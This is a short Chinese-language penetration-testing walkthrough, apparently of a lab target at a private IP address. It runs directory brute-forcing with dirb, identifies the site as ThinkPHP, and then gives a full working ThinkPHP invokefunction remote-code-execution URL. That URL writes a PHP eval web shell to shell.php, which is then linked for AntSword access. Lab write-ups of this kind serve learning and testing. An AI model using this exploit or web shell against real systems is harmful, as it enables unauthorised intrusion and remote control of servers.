目录
外网打点
先爆破一下看看有没有啥可进攻路径
尝试那个可疑的路径发现是thinkphp这个框架,同时也知道了版本,那就nday打吧
写入php
编辑写入php成功,简简单单nday拿下编辑
蚁剑rce尝试链接
打点成功
外网打点
先爆破一下看看有没有啥可进攻路径
dirsearch,dirb,gobuster等工具都可以尝试
dirb http://192.168.20.130/
尝试那个可疑的路径发现是thinkphp这个框架,同时也知道了版本,那就nday打吧
写入php
http://192.168.20.130/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>
写入php成功,简简单单nday拿下
http://192.168.20.130/public/shell.php